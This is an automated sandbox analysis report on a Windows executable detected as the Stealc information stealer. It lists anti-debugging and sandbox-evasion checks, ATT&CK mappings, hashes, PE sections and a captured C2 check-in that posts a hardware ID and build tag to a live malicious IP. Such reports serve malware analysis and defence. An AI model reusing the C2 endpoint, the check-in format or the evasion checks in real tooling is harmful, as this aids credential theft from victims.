Source: file.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13351
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13354
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13371
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13366
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13406
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3168, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (listed per tactic; a number in parentheses is the count of matched signatures for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 44% | Virustotal | | Browse
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                http://185.215.113.37/ws | 17% | Virustotal | | Browse
                http://185.215.113.37/e2b1563c6670f193.php0 | 17% | Virustotal | | Browse
                http://185.215.113.37/e2b1563c6670f193.phpW | 17% | Virustotal | | Browse
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php0 | file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpW | file.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523127
                Start date and time:2024-10-01 06:56:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 84
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.945644704303884
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'840'128 bytes
                MD5:e12dff26d257800a0f411dda1fdb521f
                SHA1:ed660b5a175dce979ca5e77f13d2e89b2c8aaadc
                SHA256:e082f507be5674e4813a6f32759c2551bfedea8e298082cab225b787b6e89d60
                SHA512:4771f88f9f2a7fa1a165866c1782564d141d8030ff3110cc5d002f8d0ddf2a5e85d66eabca99d10383cff02e0e4b465b9f896d89b27b2e3e6a767cb1d897728b
                SSDEEP:24576:RkRhl9USnloGAklNG66X57K/zlRvKxh6k3aVa12FDhvH55NQ7DrG3Mp5C2GS2:SbKGBnGpNcbchsIg5hvZ5NEi8p5+
                TLSH:E88533A3950EAEE5C7E061FD980311CBAB6CB115FD8F2EF20FAC644B456673682E1453
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:90cececece8e8eb0
                Entrypoint:0xa94000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x25b000 | 0x22800 | d7c5e4fd175dd3e4a7c4c35b551ffd41 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x25e000 | 0x29a000 | 0x200 | 691ac3fb7a6fe7e23240fa258f37c7a3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                mbunfolu | 0x4f8000 | 0x19b000 | 0x19b000 | 1d95a7236c16f1cd441e48e051424b8c | False | 0.9947512735705596 | data | 7.952881013739973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                qktpvyhd | 0x693000 | 0x1000 | 0x600 | cd939201cb228c296873b75d96e61c63 | False | 0.5657552083333334 | data | 4.952435486423867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x694000 | 0x3000 | 0x2200 | 17b3a57ca9860797039d1ddec5faee39 | False | 0.07123161764705882 | DOS executable (COM) | 0.8099240214878086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-01T06:56:59.379515+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 1, 2024 06:56:58.444952011 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:56:58.449980021 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 1, 2024 06:56:58.450126886 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:56:58.450273991 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:56:58.455061913 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 1, 2024 06:56:59.149878979 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 1, 2024 06:56:59.149955988 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:56:59.152244091 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:56:59.157118082 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 1, 2024 06:56:59.379400969 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 1, 2024 06:56:59.379514933 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 1, 2024 06:57:01.801373959 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                • 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 3168 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 1, 2024 06:56:58.450273991 CEST | 89 | OUT | GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 1, 2024 06:56:59.149878979 CEST | 203 | IN | HTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 04:56:59 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 1, 2024 06:56:59.152244091 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
                Host: 185.215.113.37
                Content-Length: 210
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a
                Data Ascii (CRLF line breaks restored from the raw bytes):
                ------IIIECAAKECFHIECBKJDH
                Content-Disposition: form-data; name="hwid"

                B3CAD27F7324796922796
                ------IIIECAAKECFHIECBKJDH
                Content-Disposition: form-data; name="build"

                doma
                ------IIIECAAKECFHIECBKJDH--
                Oct 1, 2024 06:56:59.379400969 CEST | 210 | IN | HTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 04:56:59 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s= (base64 of "block")
                Target ID:0
                Start time:00:56:54
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0xfb0000
                File size:1'840'128 bytes
                MD5 hash:E12DFF26D257800A0F411DDA1FDB521F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true
                  Execution Graph

                  Execution Coverage:8.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
API calls 13774->13775 13776 fb2ca9 13775->13776 13777 fb45c0 2 API calls 13776->13777 13778 fb2cc2 13777->13778 13779 fb45c0 2 API calls 13778->13779 13780 fb2cdb 13779->13780 13781 fb45c0 2 API calls 13780->13781 13782 fb2cf4 13781->13782 13783 fb45c0 2 API calls 13782->13783 13784 fb2d0d 13783->13784 13785 fb45c0 2 API calls 13784->13785 13786 fb2d26 13785->13786 13787 fb45c0 2 API calls 13786->13787 13788 fb2d3f 13787->13788 13789 fb45c0 2 API calls 13788->13789 13790 fb2d58 13789->13790 13791 fb45c0 2 API calls 13790->13791 13792 fb2d71 13791->13792 13793 fb45c0 2 API calls 13792->13793 13794 fb2d8a 13793->13794 13795 fb45c0 2 API calls 13794->13795 13796 fb2da3 13795->13796 13797 fb45c0 2 API calls 13796->13797 13798 fb2dbc 13797->13798 13799 fb45c0 2 API calls 13798->13799 13800 fb2dd5 13799->13800 13801 fb45c0 2 API calls 13800->13801 13802 fb2dee 13801->13802 13803 fb45c0 2 API calls 13802->13803 13804 fb2e07 13803->13804 13805 fb45c0 2 API calls 13804->13805 13806 fb2e20 13805->13806 13807 fb45c0 2 API calls 13806->13807 13808 fb2e39 13807->13808 13809 fb45c0 2 API calls 13808->13809 13810 fb2e52 13809->13810 13811 fb45c0 2 API calls 13810->13811 13812 fb2e6b 13811->13812 13813 fb45c0 2 API calls 13812->13813 13814 fb2e84 13813->13814 13815 fb45c0 2 API calls 13814->13815 13816 fb2e9d 13815->13816 13817 fb45c0 2 API calls 13816->13817 13818 fb2eb6 13817->13818 13819 fb45c0 2 API calls 13818->13819 13820 fb2ecf 13819->13820 13821 fb45c0 2 API calls 13820->13821 13822 fb2ee8 13821->13822 13823 fb45c0 2 API calls 13822->13823 13824 fb2f01 13823->13824 13825 fb45c0 2 API calls 13824->13825 13826 fb2f1a 13825->13826 13827 fb45c0 2 API calls 13826->13827 13828 fb2f33 13827->13828 13829 fb45c0 2 API calls 13828->13829 13830 fb2f4c 13829->13830 13831 fb45c0 2 API calls 13830->13831 13832 fb2f65 13831->13832 13833 fb45c0 2 API calls 13832->13833 13834 fb2f7e 13833->13834 13835 fb45c0 2 API calls 13834->13835 13836 fb2f97 13835->13836 13837 fb45c0 2 API calls 
13836->13837 13838 fb2fb0 13837->13838 13839 fb45c0 2 API calls 13838->13839 13840 fb2fc9 13839->13840 13841 fb45c0 2 API calls 13840->13841 13842 fb2fe2 13841->13842 13843 fb45c0 2 API calls 13842->13843 13844 fb2ffb 13843->13844 13845 fb45c0 2 API calls 13844->13845 13846 fb3014 13845->13846 13847 fb45c0 2 API calls 13846->13847 13848 fb302d 13847->13848 13849 fb45c0 2 API calls 13848->13849 13850 fb3046 13849->13850 13851 fb45c0 2 API calls 13850->13851 13852 fb305f 13851->13852 13853 fb45c0 2 API calls 13852->13853 13854 fb3078 13853->13854 13855 fb45c0 2 API calls 13854->13855 13856 fb3091 13855->13856 13857 fb45c0 2 API calls 13856->13857 13858 fb30aa 13857->13858 13859 fb45c0 2 API calls 13858->13859 13860 fb30c3 13859->13860 13861 fb45c0 2 API calls 13860->13861 13862 fb30dc 13861->13862 13863 fb45c0 2 API calls 13862->13863 13864 fb30f5 13863->13864 13865 fb45c0 2 API calls 13864->13865 13866 fb310e 13865->13866 13867 fb45c0 2 API calls 13866->13867 13868 fb3127 13867->13868 13869 fb45c0 2 API calls 13868->13869 13870 fb3140 13869->13870 13871 fb45c0 2 API calls 13870->13871 13872 fb3159 13871->13872 13873 fb45c0 2 API calls 13872->13873 13874 fb3172 13873->13874 13875 fb45c0 2 API calls 13874->13875 13876 fb318b 13875->13876 13877 fb45c0 2 API calls 13876->13877 13878 fb31a4 13877->13878 13879 fb45c0 2 API calls 13878->13879 13880 fb31bd 13879->13880 13881 fb45c0 2 API calls 13880->13881 13882 fb31d6 13881->13882 13883 fb45c0 2 API calls 13882->13883 13884 fb31ef 13883->13884 13885 fb45c0 2 API calls 13884->13885 13886 fb3208 13885->13886 13887 fb45c0 2 API calls 13886->13887 13888 fb3221 13887->13888 13889 fb45c0 2 API calls 13888->13889 13890 fb323a 13889->13890 13891 fb45c0 2 API calls 13890->13891 13892 fb3253 13891->13892 13893 fb45c0 2 API calls 13892->13893 13894 fb326c 13893->13894 13895 fb45c0 2 API calls 13894->13895 13896 fb3285 13895->13896 13897 fb45c0 2 API calls 13896->13897 13898 fb329e 13897->13898 13899 fb45c0 2 API calls 13898->13899 
